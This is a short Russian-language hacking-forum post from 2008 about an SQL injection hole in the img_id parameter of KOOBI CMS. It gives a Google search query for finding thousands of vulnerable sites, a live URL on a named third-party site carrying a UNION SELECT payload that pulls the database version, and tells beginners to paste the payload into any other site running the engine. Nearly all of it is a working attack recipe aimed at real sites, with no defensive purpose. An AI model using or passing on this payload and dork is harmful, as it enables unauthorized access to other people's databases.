Показать сообщение отдельно

  #10  
Старый 15.02.2008, 16:24
fobofob
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
С нами: 9881483

Репутация: 569
По умолчанию

KOOBI CMS

уязвимость в параметре img_id

пример поиска уязвимых сайтов в гугле

allinurl:"index.php?p=gallerypic" результатов порядка 4500 тыс. !!!

Пример уязвимого сайта:

код:

http://www.ria-alliance.com.ua/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,version(),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
________________________

для новичков!

чтоб увидеть инъекцию в действии на любом другом сайте работающем на этом движке,достаточно вставить код обозначеный красным цветом в примере уязвимого сайта.
 
Ответить с цитированием